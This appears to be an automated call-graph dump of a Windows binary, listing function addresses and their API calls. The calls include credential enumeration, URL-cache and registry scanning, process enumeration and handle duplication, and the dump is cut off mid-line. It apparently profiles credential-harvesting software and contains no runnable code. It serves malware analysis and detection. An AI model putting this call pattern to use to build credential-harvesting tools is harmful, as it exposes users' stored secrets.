40b6ef 249 API calls 38276->38294 38280 40b2cc 27 API calls 38286 445a94 38280->38286 38288 445c07 38281->38288 38289 445d54 _wcsicmp 38282->38289 38292 409d1f 6 API calls 38283->38292 38284->38242 38284->38253 38284->38254 38285 445389 255 API calls 38285->38219 38634 40ae18 38286->38634 38287 44566d 38287->38271 38553 413d4c 38287->38553 38297 445389 255 API calls 38288->38297 38298 445d71 38289->38298 38359 445d67 38289->38359 38291 445665 38666 40b1ab free free 38291->38666 38300 445e03 38292->38300 38294->38201 38302 445c17 38297->38302 38771 445093 23 API calls 38298->38771 38299 44563c 38299->38291 38304 4087b3 337 API calls 38299->38304 38772 409b98 GetFileAttributesW 38300->38772 38301 4456d8 38307 40b2cc 27 API calls 38301->38307 38308 40b2cc 27 API calls 38302->38308 38304->38299 38306 40b6ef 249 API calls 38306->38242 38312 4456e2 38307->38312 38313 445c23 38308->38313 38309 445d83 38309->38242 38311 445e12 38317 445e6b 38311->38317 38321 40b2cc 27 API calls 38311->38321 38668 413fa6 _wcsicmp _wcsicmp 38312->38668 38315 409d1f 6 API calls 38313->38315 38319 445c37 38315->38319 38316 445b17 38747 40aebe 38316->38747 38774 445093 23 API calls 38317->38774 38318 4456eb 38324 4456fd memset memset memset memset 38318->38324 38325 4457ea 38318->38325 38326 445389 255 API calls 38319->38326 38328 445e33 38321->38328 38669 409c70 wcscpy wcsrchr 38324->38669 38672 413d29 38325->38672 38327 445c47 38326->38327 38333 40b2cc 27 API calls 38327->38333 38334 409d1f 6 API calls 38328->38334 38330 445e7e 38335 445f67 38330->38335 38338 445c53 38333->38338 38339 445e47 38334->38339 38340 40b2cc 27 API calls 38335->38340 38336 445ab2 memset 38341 40b2cc 27 API calls 38336->38341 38337 409c70 2 API calls 38342 44577e 38337->38342 38343 409d1f 6 API calls 38338->38343 38773 409b98 GetFileAttributesW 38339->38773 38345 445f73 38340->38345 38346 445aa1 38341->38346 38347 409c70 2 API calls 38342->38347 38348 445c67 38343->38348 38350 409d1f 6 API calls 38345->38350 38346->38316 38346->38336 38351 409d1f 6 API calls 38346->38351 38641 40add4 38346->38641 38646 445389 38346->38646 38655 40ae51 38346->38655 38352 44578d 38347->38352 38353 445389 255 API calls 38348->38353 38349 445e56 38349->38317 38356 445e83 memset 38349->38356 38354 445f87 38350->38354 38351->38346 38352->38325 38358 40b2cc 27 API calls 38352->38358 38353->38219 38777 409b98 GetFileAttributesW 38354->38777 38360 40b2cc 27 API calls 38356->38360 38361 4457a8 38358->38361 38359->38242 38359->38306 38362 445eab 38360->38362 38363 409d1f 6 API calls 38361->38363 38364 409d1f 6 API calls 38362->38364 38365 4457b8 38363->38365 38366 445ebf 38364->38366 38671 409b98 GetFileAttributesW 38365->38671 38368 40ae18 9 API calls 38366->38368 38376 445ef5 38368->38376 38369 4457c7 38369->38325 38371 4087b3 337 API calls 38369->38371 38370 40ae51 9 API calls 38370->38376 38371->38325 38372 445f5c 38373 40aebe FindClose 38372->38373 38373->38335 38374 40add4 2 API calls 38374->38376 38375 40b2cc 27 API calls 38375->38376 38376->38370 38376->38372 38376->38374 38376->38375 38377 409d1f 6 API calls 38376->38377 38379 445f3a 38376->38379 38775 409b98 GetFileAttributesW 38376->38775 38377->38376 38776 445093 23 API calls 38379->38776 38381->38181 38382->38183 38383->38181 38384->38176 38386 40c775 38385->38386 38778 40b1ab free free 38386->38778 38388 40c788 38779 40b1ab free free 38388->38779 38390 40c790 38780 40b1ab free free 38390->38780 38392 40c798 38393 40aa04 free 38392->38393 38394 40c7a0 38393->38394 38781 40c274 memset 38394->38781 38399 40a8ab 9 API calls 38400 40c7c3 38399->38400 38401 40a8ab 9 API calls 38400->38401 38402 40c7d0 38401->38402 38810 40c3c3 38402->38810 38406 40c877 38415 40bdb0 38406->38415 38407 40c86c 38836 4053fe 39 API calls 38407->38836 38410 40c813 _wcslwr 38834 40c634 49 API calls 38410->38834 38412 40c829 wcslen 38413 40c7e5 38412->38413 38413->38406 38413->38407 38833 40a706 wcslen memcpy 38413->38833 38835 40c634 49 API calls 38413->38835 38999 404363 38415->38999 38418 40bf5d 39019 40440c 38418->39019 38420 40bdee 38420->38418 38423 40b2cc 27 API calls 38420->38423 38421 40bddf CredEnumerateW 38421->38420 38424 40be02 wcslen 38423->38424 38424->38418 38431 40be1e 38424->38431 38425 40be26 wcsncmp 38425->38431 38428 40be7d memset 38429 40bea7 memcpy 38428->38429 38428->38431 38430 40bf11 wcschr 38429->38430 38429->38431 38430->38431 38431->38418 38431->38425 38431->38428 38431->38429 38431->38430 38432 40b2cc 27 API calls 38431->38432 38434 40bf43 LocalFree 38431->38434 39022 40bd5d 28 API calls 38431->39022 39023 404423 38431->39023 38433 40bef6 _wcsnicmp 38432->38433 38433->38430 38433->38431 38434->38431 38435 4135f7 39036 4135e0 38435->39036 38438 40b2cc 27 API calls 38439 41360d 38438->38439 38440 40a804 8 API calls 38439->38440 38441 413613 38440->38441 38442 41361b 38441->38442 38443 41363e 38441->38443 38444 40b273 27 API calls 38442->38444 38445 4135e0 FreeLibrary 38443->38445 38446 413625 GetProcAddress 38444->38446 38447 413643 38445->38447 38446->38443 38448 413648 38446->38448 38447->38205 38449 413658 38448->38449 38450 4135e0 FreeLibrary 38448->38450 38449->38205 38451 413666 38450->38451 38451->38205 39039 4449b9 38452->39039 38455 4449b9 42 API calls 38457 444b4b 38455->38457 38456 444c15 38459 4449b9 42 API calls 38456->38459 38457->38456 39060 444972 GetVersionExW 38457->39060 38460 444c1f 38459->38460 38460->38188 38461 444b99 memcmp 38466 444b8c 38461->38466 38462 444c0b 39064 444a85 42 API calls 38462->39064 38466->38461 38466->38462 39061 444aa5 42 API calls 38466->39061 39062 40a7a0 GetVersionExW 38466->39062 39063 444a85 42 API calls 38466->39063 38469 40399d 38468->38469 39065 403a16 38469->39065 38471 403a09 39079 40b1ab free free 38471->39079 38473 403a12 wcsrchr 38473->38203 38474 4039a3 38474->38471 38477 4039f4 38474->38477 39076 40a02c CreateFileW 38474->39076 38477->38471 38478 4099c6 2 API calls 38477->38478 38478->38471 38480 414c2e 14 API calls 38479->38480 38481 404048 38480->38481 38482 414c2e 14 API calls 38481->38482 38483 404056 38482->38483 38484 409d1f 6 API calls 38483->38484 38485 404073 38484->38485 38486 409d1f 6 API calls 38485->38486 38487 40408e 38486->38487 38488 409d1f 6 API calls 38487->38488 38489 4040a6 38488->38489 38490 403af5 20 API calls 38489->38490 38491 4040ba 38490->38491 38492 403af5 20 API calls 38491->38492 38493 4040cb 38492->38493 39106 40414f memset 38493->39106 38495 404140 39120 40b1ab free free 38495->39120 38497 4040ec memset 38500 4040e0 38497->38500 38498 404148 38498->38260 38499 4099c6 2 API calls 38499->38500 38500->38495 38500->38497 38500->38499 38501 40a8ab 9 API calls 38500->38501 38501->38500 39133 40a6e6 WideCharToMultiByte 38502->39133 38504 4087ed 39134 4095d9 memset 38504->39134 38507 408809 memset memset memset memset memset 38508 40b2cc 27 API calls 38507->38508 38509 4088a1 38508->38509 38510 409d1f 6 API calls 38509->38510 38511 4088b1 38510->38511 38512 40b2cc 27 API calls 38511->38512 38513 4088c0 38512->38513 38514 409d1f 6 API calls 38513->38514 38515 4088d0 38514->38515 38516 40b2cc 27 API calls 38515->38516 38517 4088df 38516->38517 38518 409d1f 6 API calls 38517->38518 38519 4088ef 38518->38519 38520 40b2cc 27 API calls 38519->38520 38521 4088fe 38520->38521 38522 409d1f 6 API calls 38521->38522 38523 40890e 38522->38523 38524 40b2cc 27 API calls 38523->38524 38525 40891d 38524->38525 38526 409d1f 6 API calls 38525->38526 38527 40892d 38526->38527 39153 409b98 GetFileAttributesW 38527->39153 38529 40893e 38530 408943 38529->38530 38531 408958 38529->38531 39154 407fdf 75 API calls 38530->39154 39155 409b98 GetFileAttributesW 38531->39155 38534 408953 38534->38260 38535 408964 38536 408969 38535->38536 38537 40897b 38535->38537 39156 4082c7 198 API calls 38536->39156 39157 409b98 GetFileAttributesW 38537->39157 38540 408987 38541 4089a1 38540->38541 38542 40898c 38540->38542 39159 409b98 GetFileAttributesW 38541->39159 39158 408560 29 API calls 38542->39158 38545 4089ad 38546 4089b2 38545->38546 38547 4089c7 38545->38547 39160 408560 29 API calls 38546->39160 39161 409b98 GetFileAttributesW 38547->39161 38550 4089d3 38550->38534 38554 40b633 free 38553->38554 38555 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38554->38555 38556 413f00 Process32NextW 38555->38556 38557 413da5 OpenProcess 38556->38557 38558 413f17 CloseHandle 38556->38558 38559 413eb0 38557->38559 38560 413df3 memset 38557->38560 38558->38301 38559->38556 38562 413ebf free 38559->38562 38563 4099f4 3 API calls 38559->38563 39423 413f27 38560->39423 38562->38559 38563->38559 38564 413e37 GetModuleHandleW 38566 413e46 GetProcAddress 38564->38566 38567 413e1f 38564->38567 38566->38567 38567->38564 39428 413959 38567->39428 39444 413ca4 38567->39444 38569 413ea2 CloseHandle 38569->38559 38571 414c2e 14 API calls 38570->38571 38572 403eb7 38571->38572 38573 414c2e 14 API calls 38572->38573 38574 403ec5 38573->38574 38575 409d1f 6 API calls 38574->38575 38576 403ee2 38575->38576 38577 409d1f 6 API calls 38576->38577 38578 403efd 38577->38578 38579 409d1f 6 API calls 38578->38579 38580 403f15 38579->38580 38581 403af5 20 API calls 38580->38581 38582 403f29 38581->38582 38583 403af5 20 API calls 38582->38583 38584 403f3a 38583->38584 38585 40414f 33 API calls 38584->38585 38591 403f4f 38585->38591 38586 403faf 39458 40b1ab free free 38586->39458 38588 403f5b memset 38588->38591 38589 403fb7 38589->38245 38590 4099c6 2 API calls 38590->38591 38591->38586 38591->38588 38591->38590 38592 40a8ab 9 API calls 38591->38592 38592->38591 38594 414c2e 14 API calls 38593->38594 38595 403d26 38594->38595 38596 414c2e 14 API calls 38595->38596 38597 403d34 38596->38597 38598 409d1f 6 API calls 38597->38598 38599 403d51 38598->38599 38600 409d1f 6 API calls 38599->38600 38601 403d6c 38600->38601 38602 409d1f 6 API calls 38601->38602 38603 403d84 38602->38603 38604 403af5 20 API calls 38603->38604 38605 403d98 38604->38605 38606 403af5 20 API calls 38605->38606 38607 403da9 38606->38607 38608 40414f 33 API calls 38607->38608 38609 403dbe 38608->38609 38610 403e1e 38609->38610 38611 403dca memset 38609->38611 38614 4099c6 2 API calls 38609->38614 38615 40a8ab 9 API calls 38609->38615 39459 40b1ab free free 38610->39459 38611->38609 38613 403e26 38613->38248 38614->38609 38615->38609 38617 414b81 9 API calls 38616->38617 38618 414c40 38617->38618 38619 414c73 memset 38618->38619 39460 409cea 38618->39460 38623 414c94 38619->38623 38622 414c64 38622->38239 38624 414cf4 wcscpy 38623->38624 39463 414bb0 wcscpy 38623->39463 38624->38622 38626 414cd2 39464 4145ac RegQueryValueExW 38626->39464 38628 414ce9 38628->38624 38630 409d62 38629->38630 38631 409d43 wcscpy 38629->38631 38630->38280 38632 409719 2 API calls 38631->38632 38633 409d51 wcscat 38632->38633 38633->38630 38635 40aebe FindClose 38634->38635 38636 40ae21 38635->38636 38637 4099c6 2 API calls 38636->38637 38638 40ae35 38637->38638 38639 409d1f 6 API calls 38638->38639 38640 40ae49 38639->38640 38640->38346 38642 40ade0 38641->38642 38645 40ae0f 38641->38645 38643 40ade7 wcscmp 38642->38643 38642->38645 38644 40adfe wcscmp 38643->38644 38643->38645 38644->38645 38645->38346 38647 40ae18 9 API calls 38646->38647 38653 4453c4 38647->38653 38648 40ae51 9 API calls 38648->38653 38649 4453f3 38651 40aebe FindClose 38649->38651 38650 40add4 2 API calls 38650->38653 38652 4453fe 38651->38652 38652->38346 38653->38648 38653->38649 38653->38650 38654 445403 250 API calls 38653->38654 38654->38653 38656 40ae7b FindNextFileW 38655->38656 38657 40ae5c FindFirstFileW 38655->38657 38658 40ae94 38656->38658 38659 40ae8f 38656->38659 38657->38658 38661 40aeb6 38658->38661 38662 409d1f 6 API calls 38658->38662 38660 40aebe FindClose 38659->38660 38660->38658 38661->38346 38662->38661 38663->38230 38664->38210 38665->38299 38666->38287 38667->38287 38668->38318 38670 409c89 38669->38670 38670->38337 38671->38369 38673 413d39 38672->38673 38674 413d2f FreeLibrary 38672->38674 38675 40b633 free 38673->38675 38674->38673 38676 413d42 38675->38676 38677 40b633 free 38676->38677 38678 413d4a 38677->38678 38678->38271 38679->38206 38680->38196 38681->38273 38683 44db70 38682->38683 38684 40b6fc memset 38683->38684 38685 409c70 2 API calls 38684->38685 38686 40b732 wcsrchr 38685->38686 38687 40b743 38686->38687 38688 40b746 memset 38686->38688 38687->38688 38689 40b2cc 27 API calls 38688->38689 38690 40b76f 38689->38690 38691 409d1f 6 API calls 38690->38691 38692 40b783 38691->38692 39465 409b98 GetFileAttributesW 38692->39465 38694 40b7c2 39466 40bb98 38694->39466 38695 40b792 38695->38694 38696 409c70 2 API calls 38695->38696 38698 40b7a5 38696->38698 38700 40b2cc 27 API calls 38698->38700 38703 40b7b2 38700->38703 38701 40b837 CloseHandle 38705 40b83e memset 38701->38705 38702 40b817 39500 409a45 GetTempPathW 38702->39500 38707 409d1f 6 API calls 38703->38707 39499 40a6e6 WideCharToMultiByte 38705->39499 38707->38694 38708 40b827 38708->38705 38709 40b866 38710 444432 120 API calls 38709->38710 38711 40b879 38710->38711 38712 40bad5 38711->38712 38713 40b273 27 API calls 38711->38713 38715 40b04b ??3@YAXPAX 38712->38715 38714 40b89a 38713->38714 38716 438552 133 API calls 38714->38716 38717 40baf3 38715->38717 38718 40b8a4 38716->38718 38717->38198 38719 40bacd 38718->38719 38721 4251c4 136 API calls 38718->38721 38720 443d90 110 API calls 38719->38720 38720->38712 38743 40b8b8 38721->38743 38722 40bac6 39512 424f26 122 API calls 38722->39512 38723 40b8bd memset 39503 425413 17 API calls 38723->39503 38726 425413 17 API calls 38726->38743 38729 40a71b MultiByteToWideChar 38729->38743 38732 40b9b5 memcmp 38732->38743 38733 4099c6 2 API calls 38733->38743 38734 404423 37 API calls 38734->38743 38736 4251c4 136 API calls 38736->38743 38737 40bb3e memset memcpy 39513 40a734 MultiByteToWideChar 38737->39513 38740 40bb88 LocalFree 38740->38743 38743->38722 38743->38723 38743->38726 38743->38729 38743->38732 38743->38733 38743->38734 38743->38736 38743->38737 38744 40ba5f memcmp 38743->38744 38745 40a734 MultiByteToWideChar 38743->38745 39504 4253ef 16 API calls 38743->39504 39505 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38743->39505 39506 4253af 17 API calls 38743->39506 39507 4253cf 17 API calls 38743->39507 39508 447280 memset 38743->39508 39509 447960 memset memcpy memcpy memcpy 38743->39509 39510 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38743->39510 39511 447920 memcpy memcpy memcpy 38743->39511 38744->38743 38745->38743 38746->38276 38748 40aed1 38747->38748 38749 40aec7 FindClose 38747->38749 38748->38213 38749->38748 38751 4099d7 38750->38751 38752 4099da memcpy 38750->38752 38751->38752 38752->38259 38754 40b2cc 27 API calls 38753->38754 38755 44543f 38754->38755 38756 409d1f 6 API calls 38755->38756 38757 44544f 38756->38757 39602 409b98 GetFileAttributesW 38757->39602 38759 44545e 38760 445476 38759->38760 38761 40b6ef 249 API calls 38759->38761 38762 40b2cc 27 API calls 38760->38762 38761->38760 38763 445482 38762->38763 38764 409d1f 6 API calls 38763->38764 38765 445492 38764->38765 39603 409b98 GetFileAttributesW 38765->39603 38767 4454a1 38768 4454b9 38767->38768 38769 40b6ef 249 API calls 38767->38769 38768->38285 38769->38768 38770->38284 38771->38309 38772->38311 38773->38349 38774->38330 38775->38376 38776->38376 38777->38359 38778->38388 38779->38390 38780->38392 38782 414c2e 14 API calls 38781->38782 38783 40c2ae 38782->38783 38837 40c1d3 38783->38837 38788 40c3be 38805 40a8ab 38788->38805 38789 40afcf 2 API calls 38790 40c2fd FindFirstUrlCacheEntryW 38789->38790 38791 40c3b6 38790->38791 38792 40c31e wcschr 38790->38792 38793 40b04b ??3@YAXPAX 38791->38793 38794 40c331 38792->38794 38795 40c35e FindNextUrlCacheEntryW 38792->38795 38793->38788 38797 40a8ab 9 API calls 38794->38797 38795->38792 38796 40c373 GetLastError 38795->38796 38798 40c3ad FindCloseUrlCache 38796->38798 38799 40c37e 38796->38799 38800 40c33e wcschr 38797->38800 38798->38791 38801 40afcf 2 API calls 38799->38801 38800->38795 38802 40c34f 38800->38802 38803 40c391 FindNextUrlCacheEntryW 38801->38803 38804 40a8ab 9 API calls 38802->38804 38803->38792 38803->38798 38804->38795 38931 40a97a 38805->38931 38808 40a8cc 38808->38399 38937 40b1ab free free 38810->38937 38812 40c3dd 38813 40b2cc 27 API calls 38812->38813 38814 40c3e7 38813->38814 38815 40c50e 38814->38815 38816 40c3ff 38814->38816 38830 405337 38815->38830 38817 40a9ce 4 API calls 38816->38817 38818 40c418 memset 38817->38818 38938 40aa1d 38818->38938 38821 40c471 38823 40c47a _wcsupr 38821->38823 38822 40c505 38822->38815 38940 40a8d0 7 API calls 38823->38940 38825 40c498 38941 40a8d0 7 API calls 38825->38941 38827 40c4ac memset 38828 40aa1d 38827->38828 38829 40c4e4 RegEnumValueW 38828->38829 38829->38822 38829->38823 38942 405220 38830->38942 38833->38410 38834->38412 38835->38413 38836->38406 38838 40ae18 9 API calls 38837->38838 38844 40c210 38838->38844 38839 40ae51 9 API calls 38839->38844 38840 40c264 38841 40aebe FindClose 38840->38841 38843 40c26f 38841->38843 38842 40add4 2 API calls 38842->38844 38849 40e5ed memset memset 38843->38849 38844->38839 38844->38840 38844->38842 38845 40c231 _wcsicmp 38844->38845 38846 40c1d3 34 API calls 38844->38846 38845->38844 38847 40c248 38845->38847 38846->38844 38862 40c084 21 API calls 38847->38862 38850 414c2e 14 API calls 38849->38850 38851 40e63f 38850->38851 38852 409d1f 6 API calls 38851->38852 38853 40e658 38852->38853 38863 409b98 GetFileAttributesW 38853->38863 38855 40e667 38856 409d1f 6 API calls 38855->38856 38858 40e680 38855->38858 38856->38858 38864 409b98 GetFileAttributesW 38858->38864 38859 40e68f 38860 40c2d8 38859->38860 38865 40e4b2 38859->38865 38860->38788 38860->38789 38862->38844 38863->38855 38864->38859 38886 40e01e 38865->38886 38867 40e593 38869 40e5b0 38867->38869 38870 40e59c DeleteFileW 38867->38870 38868 40e521 38868->38867 38909 40e175 38868->38909 38871 40b04b ??3@YAXPAX 38869->38871 38870->38869 38872 40e5bb 38871->38872 38874 40e5c4 CloseHandle 38872->38874 38875 40e5cc 38872->38875 38874->38875 38877 40b633 free 38875->38877 38876 40e573 38878 40e584 38876->38878 38879 40e57c CloseHandle 38876->38879 38880 40e5db 38877->38880 38930 40b1ab free free 38878->38930 38879->38878 38883 40b633 free 38880->38883 38882 40e540 38882->38876 38929 40e2ab 30 API calls 38882->38929 38884 40e5e3 38883->38884 38884->38860 38887 406214 22 API calls 38886->38887 38888 40e03c 38887->38888 38889 40e16b 38888->38889 38890 40dd85 74 API calls 38888->38890 38889->38868 38891 40e06b 38890->38891 38891->38889 38892 40afcf ??2@YAPAXI ??3@YAXPAX 38891->38892 38893 40e08d OpenProcess 38892->38893 38894 40e0a4 GetCurrentProcess DuplicateHandle 38893->38894 38898 40e152 38893->38898 38895 40e0d0 GetFileSize 38894->38895 38896 40e14a CloseHandle 38894->38896 38899 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38895->38899 38896->38898 38897 40e160 38901 40b04b ??3@YAXPAX 38897->38901 38898->38897 38900 406214 22 API calls 38898->38900 38902 40e0ea 38899->38902 38900->38897 38901->38889 38903 4096dc CreateFileW 38902->38903 38904 40e0f1 CreateFileMappingW 38903->38904 38905 40e140 CloseHandle CloseHandle 38904->38905 38906 40e10b MapViewOfFile 38904->38906 38905->38896 38907 40e13b CloseHandle 38906->38907 38908 40e11f WriteFile UnmapViewOfFile 38906->38908 38907->38905 38908->38907 38910 40e18c 38909->38910 38911 406b90 11 API calls 38910->38911 38912 40e19f 38911->38912 38913 40e1a7 memset 38912->38913 38914 40e299 38912->38914 38919 40e1e8 38913->38919 38915 4069a3 ??3@YAXPAX free 38914->38915 38916 40e2a4 38915->38916 38916->38882 38917 406e8f 13 API calls 38917->38919 38918 406b53 SetFilePointerEx ReadFile 38918->38919 38919->38917 38919->38918 38920 40dd50 _wcsicmp 38919->38920 38921 40e283 38919->38921 38925 40742e 8 API calls 38919->38925 38926 40aae3 wcslen wcslen _memicmp 38919->38926 38927 40e244 _snwprintf 38919->38927 38920->38919 38922 40e291 38921->38922 38923 40e288 free 38921->38923 38924 40aa04 free 38922->38924 38923->38922 38924->38914 38925->38919 38926->38919 38928 40a8d0 7 API calls 38927->38928 38928->38919 38929->38882 38930->38867 38934 40a980 38931->38934 38932 40a995 _wcsicmp 38932->38934 38933 40a99c wcscmp 38933->38934 38934->38932 38934->38933 38935 40a8bb 38934->38935 38935->38808 38936 40a8d0 7 API calls 38935->38936 38936->38808 38937->38812 38939 40aa23 RegEnumValueW 38938->38939 38939->38821 38939->38822 38940->38825 38941->38827 38943 405335 38942->38943 38944 40522a 38942->38944 38943->38413 38945 40b2cc 27 API calls 38944->38945 38946 405234 38945->38946 38947 40a804 8 API calls 38946->38947 38948 40523a 38947->38948 38987 40b273 38948->38987 38950 405248 _mbscpy _mbscat GetProcAddress 38951 40b273 27 API calls 38950->38951 38952 405279 38951->38952 38990 405211 GetProcAddress 38952->38990 38954 405282 38955 40b273 27 API calls 38954->38955 38956 40528f 38955->38956 38991 405211 GetProcAddress 38956->38991 38958 405298 38959 40b273 27 API calls 38958->38959 38960 4052a5 38959->38960 38992 405211 GetProcAddress 38960->38992 38962 4052ae 38963 40b273 27 API calls 38962->38963 38964 4052bb 38963->38964 38993 405211 GetProcAddress 38964->38993 38966 4052c4 38967 40b273 27 API calls 38966->38967 38968 4052d1 38967->38968 38994 405211 GetProcAddress 38968->38994 38970 4052da 38971 40b273 27 API calls 38970->38971 38972 4052e7 38971->38972 38995 405211 GetProcAddress 38972->38995 38974 4052f0 38975 40b273 27 API calls 38974->38975 38976 4052fd 38975->38976 38996 405211 GetProcAddress 38976->38996 38978 405306 38979 40b273 27 API calls 38978->38979 38980 405313 38979->38980 38997 405211 GetProcAddress 38980->38997 38982 40531c 38983 40b273 27 API calls 38982->38983 38984 405329 38983->38984 38998 405211 GetProcAddress 38984->38998 38986 405332 38986->38943 38988 40b58d 27 API calls 38987->38988 38989 40b18c 38988->38989 38989->38950 38990->38954 38991->38958 38992->38962 38993->38966 38994->38970 38995->38974 38996->38978 38997->38982 38998->38986 39000 40440c FreeLibrary 38999->39000 39001 40436d 39000->39001 39002 40a804 8 API calls 39001->39002 39003 404377 39002->39003 39004 404383 39003->39004 39005 404405 39003->39005 39006 40b273 27 API calls 39004->39006 39005->38418 39005->38420 39005->38421 39007 40438d GetProcAddress 39006->39007 39008 40b273 27 API calls 39007->39008 39009 4043a7 GetProcAddress 39008->39009 39010 40b273 27 API calls 39009->39010 39011 4043ba GetProcAddress 39010->39011 39012 40b273 27 API calls 39011->39012 39013 4043ce GetProcAddress 39012->39013 39014 40b273 27 API calls 39013->39014 39015 4043e2 GetProcAddress 39014->39015 39016 4043f1 39015->39016 39017 4043f7 39016->39017 39018 40440c FreeLibrary 39016->39018 39017->39005 39018->39005 39020 404413 FreeLibrary 39019->39020 39021 40441e 39019->39021 39020->39021 39021->38435 39022->38431 39024 40442e 39023->39024 39025 40447e 39023->39025 39026 40b2cc 27 API calls 39024->39026 39025->38431 39027 404438 39026->39027 39028 40a804 8 API calls 39027->39028 39029 40443e 39028->39029 39030 404445 39029->39030 39031 404467 39029->39031 39032 40b273 27 API calls 39030->39032 39031->39025 39034 404475 FreeLibrary 39031->39034 39033 40444f GetProcAddress 39032->39033 39033->39031 39035 404460 39033->39035 39034->39025 39035->39031 39037 4135f6 39036->39037 39038 4135eb FreeLibrary 39036->39038 39037->38438 39038->39037 39040 4449c4 39039->39040 39041 444a52 39039->39041 39042 40b2cc 27 API calls 39040->39042 39041->38455 39041->38460 39043 4449cb 39042->39043 39044 40a804 8 API calls 39043->39044 39045 4449d1 39044->39045 39046 40b273 27 API calls 39045->39046 39047 4449dc GetProcAddress 39046->39047 39048 40b273 27 API calls 39047->39048 39049 4449f3 GetProcAddress 39048->39049 39050 40b273 27 API calls 39049->39050 39051 444a04 GetProcAddress 39050->39051 39052 40b273 27 API calls 39051->39052 39053 444a15 GetProcAddress 39052->39053 39054 40b273 27 API calls 39053->39054 39055 444a26 GetProcAddress 39054->39055 39056 40b273 27 API calls 39055->39056 39057 444a37 GetProcAddress 39056->39057 39058 40b273 27 API calls 39057->39058 39059 444a48 GetProcAddress 39058->39059 39059->39041 39060->38466 39061->38466 39062->38466 39063->38466 39064->38456 39066 403a29 39065->39066 39080 403bed memset memset 39066->39080 39068 403ae7 39093 40b1ab free free 39068->39093 39069 403a3f memset 39074 403a2f 39069->39074 39071 403aef 39071->38474 39072 40a8d0 7 API calls 39072->39074 39073 409d1f 6 API calls 39073->39074 39074->39068 39074->39069 39074->39072 39074->39073 39075 409b98 GetFileAttributesW 39074->39075 39075->39074 39077 40a051 GetFileTime CloseHandle 39076->39077 39078 4039ca CompareFileTime 39076->39078 39077->39078 39078->38474 39079->38473 39081 414c2e 14 API calls 39080->39081 39082 403c38 39081->39082 39083 409719 2 API calls 39082->39083 39084 403c3f wcscat 39083->39084 39085 414c2e 14 API calls 39084->39085 39086 403c61 39085->39086 39087 409719 2 API calls 39086->39087 39088 403c68 wcscat 39087->39088 39094 403af5 39088->39094 39091 403af5 20 API calls 39092 403c95 39091->39092 39092->39074 39093->39071 39095 403b02 39094->39095 39096 40ae18 9 API calls 39095->39096 39104 403b37 39096->39104 39097 403bdb 39098 40aebe FindClose 39097->39098 39099 403be6 39098->39099 39099->39091 39100 40ae18 9 API calls 39100->39104 39101 40ae51 9 API calls 39101->39104 39102 40aebe FindClose 39102->39104 39103 40add4 wcscmp wcscmp 39103->39104 39104->39097 39104->39100 39104->39101 39104->39102 39104->39103 39105 40a8d0 7 API calls 39104->39105 39105->39104 39107 409d1f 6 API calls 39106->39107 39108 404190 39107->39108 39121 409b98 GetFileAttributesW 39108->39121 39110 40419c 39111 4041a7 6 API calls 39110->39111 39112 40435c 39110->39112 39113 40424f 39111->39113 39112->38500 39113->39112 39115 40425e memset 39113->39115 39117 409d1f 6 API calls 39113->39117 39118 40a8ab 9 API calls 39113->39118 39122 414842 39113->39122 39115->39113 39116 404296 wcscpy 39115->39116 39116->39113 39117->39113 39119 4042b6 memset memset _snwprintf wcscpy 39118->39119 39119->39113 39120->38498 39121->39110 39125 41443e 39122->39125 39124 414866 39124->39113 39126 41444b 39125->39126 39127 414451 39126->39127 39128 4144a3 GetPrivateProfileStringW 39126->39128 39129 414491 39127->39129 39130 414455 wcschr 39127->39130 39128->39124 39132 414495 WritePrivateProfileStringW 39129->39132 39130->39129 39131 414463 _snwprintf 39130->39131 39131->39132 39132->39124 39133->38504 39135 40b2cc 27 API calls 39134->39135 39136 409615 39135->39136 39137 409d1f 6 API calls 39136->39137 39138 409625 39137->39138 39163 409b98 GetFileAttributesW 39138->39163 39140 409634 39141 409648 39140->39141 39164 4091b8 memset 39140->39164 39142 40b2cc 27 API calls 39141->39142 39145 408801 39141->39145 39144 40965d 39142->39144 39146 409d1f 6 API calls 39144->39146 39145->38507 39145->38534 39147 40966d 39146->39147 39216 409b98 GetFileAttributesW 39147->39216 39149 40967c 39149->39145 39150 409681 39149->39150 39217 409529 72 API calls 39150->39217 39152 409690 39152->39145 39153->38529 39154->38534 39155->38535 39156->38534 39157->38540 39158->38541 39159->38545 39160->38547 39161->38550 39163->39140 39218 40a6e6 WideCharToMultiByte 39164->39218 39166 409202 39219 444432 39166->39219 39169 40b273 27 API calls 39170 409236 39169->39170 39265 438552 39170->39265 39173 409383 39175 40b273 27 API calls 39173->39175 39177 409399 39175->39177 39176 409254 39178 40937b 39176->39178 39286 4253cf 17 API calls 39176->39286 39179 438552 133 API calls 39177->39179 39290 424f26 122 API calls 39178->39290 39198 4093a3 39179->39198 39182 409267 39287 4253cf 17 API calls 39182->39287 39183 4094ff 39294 443d90 39183->39294 39186 4251c4 136 API calls 39186->39198 39187 409273 39288 4253af 17 API calls 39187->39288 39188 409507 39196 40951d 39188->39196 39314 408f2f 77 API calls 39188->39314 39190 4093df 39293 424f26 122 API calls 39190->39293 39191 40927f 39289 4253af 17 API calls 39191->39289 39192 4253cf 17 API calls 39192->39198 39196->39141 39197 40928b 39197->39178 39199 4092be memcpy memcmp 39197->39199 39198->39183 39198->39186 39198->39190 39198->39192 39200 4093e4 39198->39200 39291 4253af 17 API calls 39200->39291 39206 4093ed 39292 4253af 17 API calls 39206->39292 39209 4093f9 39209->39190 39210 409409 memcmp 39209->39210 39210->39190 39211 409421 memcmp 39210->39211 39212 4094a4 memcmp 39211->39212 39213 409435 39211->39213 39212->39190 39215 4094b8 memcpy memcpy 39212->39215 39213->39190 39214 409442 memcpy memcpy memcpy 39213->39214 39214->39190 39215->39190 39216->39149 39217->39152 39218->39166 39315 4438b5 39219->39315 39221 44444c 39222 409215 39221->39222 39329 415a6d 39221->39329 39222->39169 39222->39196 39225 444486 39227 4444b9 memcpy 39225->39227 39264 4444a4 39225->39264 39226 44469e 39226->39222 39229 443d90 110 API calls 39226->39229 39333 415258 39227->39333 39229->39222 39230 444524 39231 444541 39230->39231 39232 44452a 39230->39232 39336 444316 39231->39336 39370 416935 39232->39370 39236 444316 18 API calls 39237 444563 39236->39237 39238 444316 18 API calls 39237->39238 39239 44456f 39238->39239 39240 444316 18 API calls 39239->39240 39241 44457f 39240->39241 39241->39264 39350 432d4e 39241->39350 39244 444316 18 API calls 39245 4445b0 39244->39245 39354 41eed2 39245->39354 39383 4442e6 11 